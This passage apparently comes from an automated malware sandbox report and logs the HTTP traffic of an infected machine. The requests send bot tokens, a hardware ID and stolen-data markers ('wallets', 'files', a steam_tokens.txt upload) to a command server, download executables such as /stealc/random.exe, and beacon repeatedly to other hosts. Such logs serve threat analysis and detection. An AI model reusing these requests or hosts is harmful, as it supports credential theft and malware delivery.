22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="message"wallets------GIEHIDHJDBFIIECAKECB--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="message"ybncbhylepme------JEBKEHJJDAAAAKECBGHD--
                          Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /cost/go.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file"------AKKKECBKKECGCAAAEHJK--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 2d 2d 0d 0a Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="message"files------DAKEHIJJKEGIDHIEHDAF--
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 2d 2d 0d 0a Data Ascii: ------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KJEBKJDAFHJDGDHJKKEG--
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET /cost/num.exe HTTP/1.1Host: 77.91.77.81
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 39 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000019031&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000021001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHCHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build"sila------GDBKJDGIJECFIEBFIDHC--
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
